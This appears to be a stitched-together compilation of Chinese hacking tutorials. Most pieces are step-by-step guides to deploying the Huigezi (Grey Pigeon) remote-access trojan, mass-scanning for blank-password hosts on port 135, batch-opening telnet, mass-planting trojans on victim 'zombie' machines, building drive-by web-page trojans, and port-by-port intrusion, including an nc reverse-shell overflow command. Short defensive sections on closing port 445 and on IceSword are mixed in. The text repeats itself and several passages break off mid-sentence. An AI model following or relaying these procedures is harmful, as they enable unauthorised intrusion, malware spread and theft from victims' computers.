第一:先打开灰鸽子(如图1)
初始界面。现在开始配置服务端(如图2)
其他几项不重要按个人要求来选,主要是填写公网IP、域名填好后生成服务端保存在指定路径!
注:本人用的是固定公网IP 所以只需要填写IP 在局域网使用灰鸽子需要做端口映射!介绍一个映射工具=================比特精灵端口映射工具UPnP局域网专用(如图3)===============
打开工具以后点下一步它会自动查找UPNP设备(去掉忽略ICF防火墙前面的勾~)查找出设备后(如图4)
下一步开始设置(如图5)
设置好后下一步提示添加映射端口成功!(如图6)
映射成功后不要关闭工具!
============================================================== 配置好服务端以后接下来测试一下鸽子是否能上线!只要运行一下(如图7)
鸽子配置好测试成功能上线了接下来批量扫135端口抓肉鸡!!
用十段S扫描器扫几段IP(如图8)
开始以后出现DOS界面扫到的IP全是开135端口的机器(如图9)
呵呵还不少呢~~扫完以后DOS界面会自动关系在文件目录下出现Result.txt一个文档我们用扫描整理器处理一下只保留干净的IP 点“修正并保存文件”处理后在目录下会出现一个host.txt 的文件!(如图10)
找到开135端口的IP 就该用NTscan 这个工具扫135的空口令了!(如图11)
就先扫到这里其实还有好多呢!!关闭NTscan以后会在目录下自动建出一个NTscan.txt的文件里面还
是未经过处理的IP需要把没用的字符去掉保留干净的IP 这里我们用记事本自带的替换功能就可以完成!不用说大家因该都会。处理后的IP 连空格都需要去掉!(如图12)
筛选出开135端口空口令的IP以后需要用一个批量开23端口的工具把这些IP的23端口全部打开!(如图13)
点开始工具会自动批量开23端口程序运行还是在DOS界面下处理开好23端口后DOS窗口自动关闭,接下来用端口过滤工具把开好的23端口再次过滤在抓肉鸡的时候更加准确!
把刚才找到的NTscan.txt文件后缀改成lst为NTscan.lst 呵呵这个工具只能后缀lst的文件所以要改一下后缀
改好后打开工具导入开始过滤!(如图14)
下一步导出过滤好的IP另存为23.txt文件!操作到这里已经一大半了全是批量处理还不是累就是耗时间
接下来是最重要的部分了就是批量传马了废话不多说继续!
我们先用Serv-U架设一个FTP 以后在传马的时候会用上(用别人的FTP空间也可以去免费空间申请一个就行本人是自己架设的空间别人的不稳定权限设置的很严格不能上传EXE文件或是下载上传带宽做了限制比较慢)架设FTP我想大家也都会我也就不介绍了!(如图15)是我简单架设的FTP
FTP架设好以后配置一下JS脚本!(如图16)
打来SecureCRT.EXE —>选项—>全局选项—>编辑默认设置—>选正编写好的JS脚本
下一步运行批量传马工具填写配置基本和批量开23端口类似!(如图18)
填写好以后点开始工具自动运行JS脚本批处理传马呵呵现在鸽子提示已经有肉鸡让线了不过不是很多因为我的小马没有做免杀!可怜~~看看有3只肉鸡了!(如图19)
哈哈还有一个德国小鸡~~
下一步运行批量传马工具填写配置基本和批量开23端口类似!(如图18)
填写好以后点开始工具自动运行JS脚本批处理传马呵呵现在鸽子提示已经有肉鸡让线了不过不是很多因为我的小马没有做免杀!可怜~~看看有3只肉鸡了!(如图19)
哈哈还有一个德国小鸡~~
==============此文章只供参考学习若使用给别人带来损失本人概不负责==============
灰鸽子使用方法++网页木马生成和制作详解++图片噢!!! 2007-11-28 23:22:31| 分类:技术| 标签:|字号大中小订阅 一、工具:灰鸽子VIP 200 5破解版 服务端配置是最基础的,我大概说下重点.首先点”自动上线”,在”网易免费域名更新IP”处先申请一个免费域名,比如https://www.doczj.com/doc/fb5669373.html,,再点”更新IP到域名”,如果一次更新出错就反复多试几次,一般会成功 的 图1 再点”配置服务程序’,这里有几点值得注意: 1.”自动上线”处一定要填正确了,就填我们刚才申请的域名https://www.doczj.com/doc/fb5669373.html,,下面的”自动上线连 接密码”可不填,填写是为了安全. 2.关于破解:这也是最关键的地方,在运行鸽子客户端的时候我们先要运行它的破解文件,我们双击hosts.exe,自解压路径不能改变,至于为什么不能变大家想下就会明白了,然后运行http.exe,点”开始服务”(如果你本身的IIS开了的话应该先将其停止).前提步骤做好了,我们打开鸽子.如图2.在配置服务端的用户名和用户密码处随便填写即可.然后点”生成服务端”,到这服务端就生成了,每一步都是关键的,少一步, 服务端可能就不能生成.
二、制作网页木马 工具:专业版网页木马生成器[IFRAME溢出] 南域剑盟网页木马生成器 教主网页木马生成器 潜入者修改免杀版(备用) 光有服务端是不行的,必需要发给对方运行才行,那怎么让对方运行呢?直接将exe文件发给对方吗?基本上是很难成功的,我想最好是通过网页,让对方在浏览网页的时候不知不觉中马.做网页木马之前必需要有一个免费的空间让你放马.网上免费空间很多,大家去申请就是了.假设我们现在已经申请好了,空间地址为:https://www.doczj.com/doc/fb5669373.html,/setup.exe.前提具备了.我们开始工作!先使用专业版网页木马生成器.如图 3. 在”木马程序路径”上填写http;//https://www.doczj.com/doc/fb5669373.html,/setup.exe”,”生成的网页名1,2” 可以随便填,保持默认即可。下面一栏”对于IE5,IE5.5使用冰狐浪子超级木马”使用之前需要把setup.exe拷贝到chm目录中,在”木马程序名称”处填写setup.exe,在”生成后的chm文件名”处保持默认icyfox.chm即可,在”用于存放上面chm文件的完整地址处填写https://www.doczj.com/doc/fb5669373.html,/icyfox.htm,最后单击生成。将生成的
网络安全知识 拒绝服务攻击 BIOS控制计算机安全 黑客突破防火墙常用的几种技术 妙用Windows神秘的类标识符 部署防火墙策略的十六条守则 拒绝服务攻击 入侵攻击 可以说当前是一个进行攻击的黄金时期,很多的系统都很脆弱并且很容易受到攻击,所以这是一个成为黑客的大好时代,可让他们利用的方法和工具是如此之多!在此我们仅对经常被使用的入侵攻击手段做一讨论。 【拒绝服务攻击】 拒绝服务攻击(Denial of Service, DoS)是一种最悠久也是最常见的攻击形式。严格来说,拒绝服务攻击并不是某一种具体的攻击方式,而是攻击所表现出来的结果,最终使得目标系统因遭受某种程度
的破坏而不能继续提供正常的服务,甚至导致物理上的瘫痪或崩溃。具体的操作方法可以是多种多样的,可以是单一的手段,也可以是多种方式的组合利用,其结果都是一样的,即合法的用户无法访问所需信息。 通常拒绝服务攻击可分为两种类型。 第一种是使一个系统或网络瘫痪。如果攻击者发送一些非法的数据或数据包,就可以使得系统死机或重新启动。本质上是攻击者进行了一次拒绝服务攻击,因为没有人能够使用资源。以攻击者的角度来看,攻击的刺激之处在于可以只发送少量的数据包就使一个系统无法访问。在大多数情况下,系统重新上线需要管理员的干预,重新启动或关闭系统。所以这种攻击是最具破坏力的,因为做一点点就可以破坏,而修复却需要人的干预。 第二种攻击是向系统或网络发送大量信息,使系统或网络不能响应。例如,如果一个系统无法在一分钟之内处理100个数据包,攻击者却每分钟向他发送1000个数据包,这时,当合法用户要连接系统时,用户将得不到访问权,因为系统资源已经不足。进行这种攻击时,攻击者必须连续地向系统发送数据包。当攻击者不向系统发送数据包时,攻击停止,系统也就恢复正常了。此攻击方法攻击者要耗费很多精力,因为他必须不断地发送数据。有时,这种攻击会使系统瘫痪,然而大多多数情况下,恢复系统只需要少量人为干预。 这两种攻击既可以在本地机上进行也可以通过网络进行。 ※拒绝服务攻击类型
原创作者unis 远程控制分类与远程协助区别 远程控制技术是黑客必学的技术之一。远程控制不同于远程协助,两者之间有很大的区别,所谓远程协助需要经过被控端的授权允许,并且被控端可以看到控制者的所有操作,使之控制操作透明性;例如我们的QQ远程协助,就需要对方的允许控制进行操作,并且对方也能够看到我们的操作动作,远程协助一般是用来进行远程的计算机操作协助。远程控制则不一样,远程控制只要在被控者电脑安装一个服务端,即可在不知情的情况下进行控制对方计算机以及对计算机其它操作,控制时不需要经过对方的许可就可以控制,而控制时操作的一些动作,对方也无法察觉到(除鼠标控制)。远程控制按控制类型可以分类为:(1)正向主动型远程控制(2)反向被动型。什么是正向主动型的呢?正向主动型是需要控制着主动去连接被控端,一般情况下,控制者必须知道需要被控制者的IP和端口,然后通过某种软件来进行控制被控者,例如微软的3389远程桌面、Radmin远程控制、VNC远程控制都需要知道对方的IP(端口)然后通过客户端软件进行连接对方。反向被动型控制又可以称为反弹性控制技术,指的是在被控端下安装服务端之后,由被控端主动来寻找你的客户端监听端口软件连接来进行控制,这个好处就是不需要知道对方的IP地址和端口,被控端会自己主动来找我们的监听地址和端口,当我们发现被控端已经找到我们的监听地址和端口,我们就可以控制对方电脑,这样省去要知道对方的IP和端口的麻烦了,特别是对方是动态IP 的时候。反向被动型远控在黑客界已经是主流了,黑客专门使用某些控制软件在控制对方,反弹型远控软件更是数不胜数,例如:花鸽子(灰鸽子)、白金、终结者、Ghost 等等。 远程控制软件的功能与远控木马的特性 我们这里主要讲解的是反弹型远控,并且也有讲解到Web型的正向型远控,正向型远控还有Radmin、3389远程桌面也可以值得大家去学习,关于Radmin远控的可以参考我之前写的《深度研究Radmin远控》。关于3389终端技术我已经写了《精通3389终端》。现在的远程控制软件(又称客户端,生成出的木马叫服务端)数不胜数,甚至很多已经是源码爆出,对于各种远程控制软件来说,其实基本都是具备以下功能: 【屏幕监控】:可以查看被控制者的屏幕,保存捕获的被控制屏幕的截图。并且看到对方的一切操作,可以自由选定图像位色查看,还 可以选择是否控制对方鼠标、键盘,若选择即可控制对方的电脑鼠标、键盘,这一控制对方是可以看到鼠标被控制。 【文件管理】:可以在后台查看被控者的各个磁盘中的文件,直接显示隐藏文件,可自由在对方的磁盘中删除文件、上传文件、下载文 件、重命名文件、远程显示打开文件、远程
灰鸽子使用教程图解 (考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看) 第一部份:网络人远程监控软件 网络人远程控制个人版分为Netman办公版与Netman监控版。两个版本主要区别在于:Netman办公版连接远程电脑时,对方会弹出提示,知道电脑正在远程连接,主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用,是一款免费的远程控制软件;Netman监控版使用会员登录后再连接,远程电脑无任何提示,对方不会发觉,主要用于监管孩童电脑,掌握孩子上网情况,保护孩子健康上网。 Netman监控版详细安装方法: 1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。 2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program
式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。 3.完成以上操作后,再按ctrl+y即可呼出软件主界面。监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。 5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。 出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。想要修改这两个密码,可点击“选项”-“修改密码”。
21端口: 21端口是默认的FTP端口,利用方式:弱口令探测/溢出 目前我还没看到远程溢出的,SERU的本地溢出漏洞风靡一时,曾经很多服务器就在沦丧于这个漏洞。 22端口 22端口是SSH远程登录协议,利用方式:弱口令探测 23端口 23端口是TLENET的默认端口,利用方式:弱口令探测/溢出 一般大家用弱口令探测得比较多,但是成功率比较低,还是溢出来得快,毕竟权限高,想做什么都可以! 25端口 25端口是SMTP协议的默认端口,邮件接收服务器。利用方式:溢出 53端口 53端口是DNS服务的默认端口,提供域名服务器, 利用方式:溢出。这个今年很火,我试了一下,一晚上差不多可以溢出10W台开几抬肉鸡的话 79端口 79端口Finger服务的默认端口(查询远程主机在线用户等信息),可以在辅助入侵中获取更多的主机信息。利用FINGER服务可以查询到主机很多敏感的信息,在入侵的时候常常可以起到意想不到的作用。
80端口 80端口是IIS的默认端口,全球信息网超文本传输协议(www)。利用方式:IIS溢出/SQL注入/旁注/跨站。不过一部分路由器的远程管理端口也是80。SQL注入大家已经很熟悉了吧,IIS溢出也只存在那些很老的机器上,看运气了。 110端口 110端口提供 Pop3 服务。邮件发送服务器。利用方式:溢出。 135端口 135端口提供查询服务。利用方式:IPC$(Internet Process Connection)入侵。 网上教程非常多,不多说了。 137端口 137端口统共NetBIOS 数据报(UDP)服务。 139端口 139端口提供共享资源服务(NetBios-SSN),用在IPC$入侵中。上面这三个端口可以综合利用。 161端口 161端口是远程管理设备(SNMP)的默认端口。这个很多小菜不知道怎么利用,那么重点来说说这个。 SNMP是简单网络管理协议,不清楚百度一下,很多小菜扫描出来了SNMP的弱口令,比如private,public等等,但是不知道怎么利用,这里介绍两款工具:IP NetWork browse 和LANguard NetWork Scnaner,这两个工具都可以扫描SNMP,而且可以扫描到,磁盘,服务,
灰鸽子[VIP 专业版] 1.只用一个端口来传输所有通讯数据!普通同类软件都用到了两个或两个以 上的端口来完成! 2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑!软件智能读 取系统设定的代理服务器信息,无需用户设置! 3.无需知道服务端IP,自动上线功能让服务端自动上线报道!灰鸽子专用的 上线系统无需您注册免费域名才能使用,同时也提供了备用上线方式,在我们的专 用上线系统出现故障时,您可以使用备用上线方式来使用自动上线功能。在使用 专用上线系统时,你还可以控制远程电脑通过Socks5代理来中转自动上线。 4.自动上线可以在第一次设置分组,自定义上线图像,上线备注等,这样都 可以让你轻而易举的找到目标主机,同时设置连接密码保证了服务主机的安全性 !同时具用牵手版的搜索符合条件主机的功能: a.从主机窗口筛选:可以列出只有某个窗口的一批主机,可以轻松找到哪些人 在玩某个游戏! b.从主机进程筛选:可以列出运行了某个程序的一批主机,例如QQ.exe,就可 以找到打开了QQ的自动上线主机有哪些了! 5.文件管理:管理远程电脑的文件系统,支持复制、粘贴、删除,断点下载、 上传文件或文件夹,文件内容均以加密方式传输,确保通讯的安全性. 6.远程控制命令:包括远程系统信息、剪切板信息、进程管理、窗口管理、 键盘记录、服务管理、管理管理、MS-DOS模拟、代理服务控制! 7.注册表编辑器:可以像操作本机注册表一样的编辑远程注册表。 8.常用命令广播,让你控制主机众多主机更多的方便!详细的在线主机线表 显示了:主机IP地址,地址位置,电脑名称,系统版本,备注等信息, 9.除了具有语音监听、语音发送,还有远程视频监控功能,只有远程计算机 有摄像头,且正常打开没有被占用,那么你可以看到,远程摄像头捕获的图片!还 可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。 10.可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能!无需第 三方软件支持!支持Windows9x/ME/2000/Xp/2003。 11.软件附带有四款实用工具: a. EXE工具: 可以修改任何EXE文件图标,支持真彩色! b. 内网端口映射器: 它允许你将局域网内的服务映射到internet上,使 你在局域网内部也能使用自动上线功能! c. FTP服务器: 可以开本机FTP服务! d. Web服务器: 可以建立一个简单的Web服务器! 12.服务端程序在Windows 2000 / xp / 2003 可以以服务启动,支持发送多 种组合键,比如:Ctrl+Alt+del等等,适用于管理服务器主机!远程屏幕捕获还可以 录制为Mpeg-1文件格式. 13.全中文友好操作界面,让你一目了然,漂亮皮肤让使用时也倍感亲切! 功能简单介绍: 【1】对远程计算机文件管理:模枋Windows 资源管理器,可以对文件进行复制、粘贴、删除,重命名、远程运行等,可以上传下载文件或文件夹,操作简单易用
有4-5个它说有非法字符像08 05 07 12 你们只要把中间的空格删了就能上了在网上找到个FTP ftp://ftp.crazystudy.:2129/ ftp://ftp2.crazystudy.:2129/里面有教程 微软金牌讲师讲解组策略(视频教程)免费下载 .jinghuazhan./jianzhan/84/749.html 爱国者黑鹰一日一动画08年所有(更新至4.20)免费下载 .jinghuazhan./jianzhan/85/748.html 黑客动画吧最新教程5-25 的教程 .jinghuazhan./jianzhan/85/747.html 华夏黑客联盟2008年大型VIP培训黑客技术系列教程 .jinghuazhan./jianzhan/85/745.html 微软windows2008官方教学视频 .jinghuazhan./jianzhan/85/746.html 黑客防线c语言编程黑客特训班(全) .jinghuazhan./jianzhan/85/743.html 黑客基地Delphi vip教程(25课全)免费高速下载 .jinghuazhan./jianzhan/85/744.html 电脑E书大全,各种计算机技术书籍,电子书免费下载 .jinghuazhan./jianzhan/84/734.html 〖红娘工作室〗木马VIP免杀培训区视频教程15课免费下载 .jinghuazhan./jianzhan/85/742.html 黑客基地VIP教程1-104课免费高速下载 .jinghuazhan./jianzhan/85/741.html 华夏黑客同盟vip教程入侵和个人电脑收集 .jinghuazhan./jianzhan/85/598.html 黑客山庄基础脱壳免费教程 .jinghuazhan./jianzhan/85/596.html PYG 原创破解入门教程,破解基础讲解,暴破实例<精装友情通讯录> .jinghuazhan./jianzhan/85/593.html 黑客VIP特训班教程系列,DELPHI,黑客基地C语言等教程 .jinghuazhan./jianzhan/85/592.html (黑软VIP)黑白网络收费教程全集下载,黑吧.黑鹰.网安vip教程,黑鹰入侵VI .jinghuazhan./jianzhan/85/518.html 第一课: HTML语言之页面标记 .hxhack./bbs/hxjc/200801jc/2008010101.rar 第二课: HTML语言之字体标记 .hxhack./bbs/hxjc/200801jc/2008010102.rar 第三课: HTML语言之文字布局标记 .hxhack./bbs/hxjc/200801jc/2008010103.rar
w i n10关闭445端口详细教程步骤 电脑病毒看不见,却无处不在,有时防护措施不够或者不当操作都会导致病毒入侵。去年一种病毒席卷了全球各地的医院和高校,它就是勒索病毒,勒索病毒最新变种 2.0已导致我国的很多行业遭受袭击。勒索病毒是通过入侵端口传播,目前已知主要通过445和135端口传播,那么只要关闭445端口即可对病毒入侵起到预防作用。本文主要介绍关闭455端口的方法。 关闭135445端口方法详细教程: 1、W i n10系统同时按W I N+R打开,(w i n7在开始菜单选择运行其余步骤W I N7/W I N10相同)输入g p e d i t.m s c 后回车,打开本地组策略编辑器。在出现的文本框中选择w i n d o w s设置里的安全设置子目录,i p安全策略。 以关闭445端口为例(现在主要是通过445端口传播)(其他端口操作相同): 2、点击菜单栏,选择创建I P安全策略,弹出I P安全策略向导对话框,单击下一步。 3、在出现对话框后直接点击下一步(名称改不改无所谓)。 4、剩下的全部默认;一直到最后一步,默认勾选编
辑属性,单击完成。 5、进入编辑对话框,在规则选项卡内,去掉使用添加向导前边的勾后,单击添加按钮。 6、在弹出的新规则属性对话框中,I P筛选器列表中,添加一个叫封端口的筛选器,最终结果见下图。 7、出结果之前对筛选器进行编辑添加端口类型,去掉使用添加向导前边的勾后,单击添加。 8、在出现的I P筛选器属性对话框中,地址选项卡中,源地址选择任何I P地址,目标地址选择我的I P地址。 9、选择协议选项卡,各项设置如图片中所示。设置好后点击确定。 (说明添加完445端口后重复上述步骤继续添加135端口,协议类型选择T C P,到此端口输入135) 10、两个都添加完最终结果如下图: 11、点击确定后,来到i p筛选器列表,选择刚才添加的封端口,然后选择筛选器操作选项卡。 12、去掉使用添加向导前面的勾,单击添加按钮,在弹出筛选器操作属性中,安全方法选项卡,选择阻止选项。
135端口入侵的方法(简单) (1)通过135端口入侵,攻击者首先需要查找网络上存在135端口漏洞的主机地址,在查找此类主机过程中,可以使用一些扫描工具,比如SuperScan就是典型的端口工具之一。在SuperScan“开始”文本框中输入需要扫描的起始地址,然后在“结束”文本框里填写好扫描结束的IP地址,在“扫描类型”选项中选择“所有端口定义”单选按钮,并在右侧的文本框中输入“135”。再点击“开始”按钮即可开始扫描。扫描结束后,在下方的列表中可以查看目标主机打开的端口。然后再点击“Save”按钮选好保存路径,把里面有漏洞的IP整理下即可。 (2)得到有漏洞后,我们还有一个功能强大的扫描工具,比如NTSscn汉化版。然后在“主机文件“处点击“打开”按钮找到我们刚才保存的IP路径,在连接共享$处选择“WMI扫描”,在“扫描打开端口的主机”处填写135端口。最后点击“开始”即可。要不了多久就会有结果显示。 (3)获得漏洞主机用户名以后,我们需要一个开启的工具,那就是Recton v2.5。好了,万事具备之欠那“东风”拉。把刚刚扫描的IP输入TELNET界面的“远程主机”处,以及用户名和密码,不过一般情况下密码都是空。下一步点击“开始执行”按钮等待把TELNET打开吧。打开后按WIN+R输入CMD进入再输入Telnet IP 回车,会提示让你输入用户名,把用户名输入后,回车即可进入主机。而且得到的还是SYSTEM 权限。 下一步就是为我们加了拥有管理员权限的用户,看看我杰作。最后我们可以上传一些远程性木马软件作为后门,比如灰鸽子,冰河等。在这里我就不在展示。我还是喜欢3389端口,那我就给他上传个开启3389的脚本,不过对于开启3389端口的工具网上还真的不少,比如Recton v2.5就有这个功能。好了3389端口已经成功开启大家看我连接的
Gray pigeons -- 灰鸽子是什么呢? 灰鸽子简单的说它是远程监控软件,(黑客类),当然也可以说他是一个病毒.木马或则说是后门之类的恶意软件 灰鸽子分为2个部分:客户端和服务端,把服务端发出去,别人下载后安装.....(当然也有不需要安装的以及IE版的只要下载[浏览]就中招)而你操纵着鸽子的客户端,你可以任意的操纵别人的电脑...-当然想让别人中招也不是那么容易的现在国内主流的杀毒软件很容易就把它和谐掉了.当然有你有杀毒软件别人也可以做出无视杀毒软件的服务端(简称:免杀),免杀的话那就是杀毒软件查不到那是一个木马程序! 鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。这就好比火药,用在不同的场合,给人类带来不同的影响!(其他的我也说不清楚)如果你会使的话那么它可以做很多事。NB点的黑客可以通过各种渠道得到它想要的东西,。(如QQ的刷钻刷QB等以及在网络上购买你想买的东西甚至其他更为贵重的物品,都可以通过它做到,当然要自己会用懂用) 总之灰鸽子在不同的人手里用法就不同,你可以拿它来逗你朋友,吓唬别人,整蛊别人,也可以拿它来刷QQ钻(前提是需要控制到宽带上网用户) 个人对鸽子的认识我对它的了解也不是全面的(现在我把鸽子的假设教程发出来喜欢耍的自己学着架设吧!) ------------------------------------ 架设教程 ------------------------------------- 首先下载灰鸽子-[你可以去百度搜索下载]我这里提供一个下载地址吧! 灰鸽子下载:https://www.doczj.com/doc/fb5669373.html,/file/t06ef189fa(不知道这个地址能活多久如果能下载就下吧下不到就自己去百度搜)
常用黑客工具(网络入侵工具) 一、扫描工具 X-scan 3.1 焦点出的扫描器,国内最优秀的安全扫描软件之一!非常专业的一个扫描器! X-way 2.5 这也上一个非常不错的扫描器哦!功能非常多!使用也不难,入侵必备工具! SuperScan 3.0 强大的TCP 端口扫描器、Ping 和域名解析器! Namp 3.5 这个就厉害了,安全界人人皆知的非常有名气的一个扫描器!作者Fyodor Hscan v1.20 这是款运行在Win NT/2000下的漏洞扫描工具,有GUI以及命令行两种扫描方式! SSS 俄罗斯安全界非常专业的一个安全漏洞扫描软件! U-Scan.exe 非常好的UNICODE漏洞扫描工具! RpcScan V1.1 可以通过135端口枚举远程主机RPC连接信息! SHED 1.01 一个用来扫描共享漏洞的机器的工具! DSScan V1.00 ms04-011 远程缓冲区溢出漏洞扫描专用! Dotpot PortReady1.6 该软件为“绿色软件”,无需安装,非常小巧(仅23KB),具有极快的扫描速度! WebDAVScan v1.0 针对WEBDA V漏洞的扫描工具! 注意:该软件解压缩时会被查杀! Socks Proxy Finder2 扫描端口速度非常快的一个工具,扫描完毕后还可以导出保存起来! SQLScan v1.2 猜解开着1433端口的住机密码工具! RPC漏洞扫描器v1.03 针对RPC漏洞扫描的工具! 流光5.0 破解版国内大名鼎鼎的黑客扫描工具,由高级程序员小榕编写! 自动攻击探测机Windows NT/2000 自动攻击探测机 4899空口令探测能够快速的扫描到被安装了radmin服务端4899端口的空口令IP! 二、远程控制
各个端口的入侵方法(入侵菜鸟必看)1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后SQLTools.exe入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 2. 4899端口入侵 用4899过滤器.exe,扫描空口令的机器 3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。(tscrack.exe) 4. 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。(小榕的注入软件)。 5. serv-u入侵(21端口) 对5. 004及以下系统,可用溢出入侵。(serv5004.exe) 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
====================================== 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A 6. 554端口 用real554.exe入侵。 7. 6129端口 用DameWare6129.exe入侵。 8. 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 9. 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 10. 其他入侵 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。 各种端口的入侵方法1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPas*.**e 进行字典暴破(字典是关键) 最后SQLTool*.**e入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
序: 灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的老大哥。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。 灰鸽子是一款反弹连接式的木马。现在上网一般是通过ADSL宽带拨号上网、modem上网、无线上网等等多种上网方式,有些是直接处于公网上的,但是也有很多都是用路由划分一个或多个vlan,通过NAT共用一个公网IP地址上网。所以这些用的IP都是内网IP。如果肉鸡中了灰鸽子的服务端,需要反弹回来连接灰鸽子客户端的8000端口。但是,拨号上网的IP不是固定不变而是动态IP,每次获得的IP都是不一样的;或者客户端的IP是一个内网IP。这个时候服务端就不知道该怎么去找到客户端并且连接客户端的8000端口了。(8000端口是灰鸽子的默认端口,这个端口是可以更改的) 要让鸽子的服务端每次都能找到客户端,反过来说就要让客户端的IP可以让服务端每次都可以找得到。不管客户端位于公网还是内网,让服务端找得到的方法其实是一样的。内网上线或者外网上线的方法有很多种:可以绑定一个DDNS 域名(动态域名),可以在路由器上做端口映射,也可以用鸽子自带的vport 工具做端口映射…… 总之方法很多,设置也很简单。如果有路由器的控制权呢可以进入路由器做鸽子的端口映射。如果没有路由器的控制权呢,只能找一个有着公网IP地址的肉鸡来做端口映射了。 因为我的上网环境是处在一个局域网,通过交换机和路由器公用一个公网IP上网,又不能获得路由器的控制权,所以我要讲的是vidc这个工具。因为用这个vidc最大的优点就是永远不会被杀毒软件查杀,这个vidc根本就不在杀毒软件的打击范围,这个不是我一个人说的,是很多黑客老前辈说的,并且我也亲身做过实验,用360杀毒、瑞星和国外杀软avast都进行过扫描,全部都是正常。 正文: 第一步: 把vidc的服务端vidcs传到公网的机子上,肉鸡或者朋友的电脑都可以。然后运行vidc服务端的命令是 vidcs.exe -端口号。比如vidcs.exe -5555.如图:
怎样使用灰鸽子 (考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看) 第一部份:网络人远程监控软件 网络人远程控制个人版分为Netman办公版与Netman监控版。两个版本主要区别在于:Netman办公版连接远程电脑时,对方会弹出提示,知道电脑正在远程连接,主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用,是一款免费的远程控制软件;Netman监控版使用会员登录后再连接,远程电脑无任何提示,对方不会发觉,主要用于监管孩童电脑,掌握孩子上网情况,保护孩子健康上网。 Netman监控版详细安装方法: 1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。 2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program
式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。 3.完成以上操作后,再按ctrl+y即可呼出软件主界面。监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。 5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。 出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。想要修改这两个密码,可点击“选项”-“修改密码”。
冰刃使用教程(顽固文件杀灭工具-冰刃Icesword) p.s. 具体可参见下面的参考资料,带图,附中文版下载 这是一斩断黑手的利刃,它适用于Windows 2000/XP/2003 操作系统,其 内部功能是十分强大,用于查探系统中的幕后黑手-木马后门,并作出处理。可 能您也用过很多类似功能的软件,比如一些进程工具、端口工具,但是现在的 系统级后门功能越来越强,一般都可轻而易举地隐藏进程、端口、注册表、文 件信息,一般的工具根本无法发现这些“幕后黑手”。IceSword 使用了大量新颖 的内核技术,使得这些后门躲无所躲。使用前请详细阅读说明。第一次使用请 保存好数据,需要您自己承担可能的风险,特别是多处理器机器的朋友,谢谢. 增加使用教程,帮助更多需要帮助的人 lceSword冰刃(以下简称IceSword)是一款斩断系统黑手的绿色软件。在笔者的 使用中,IceSword表现很令笔者满意,绝对是一把强悍的瑞士军刀——小巧、 强大。 1.IceSword的“防” 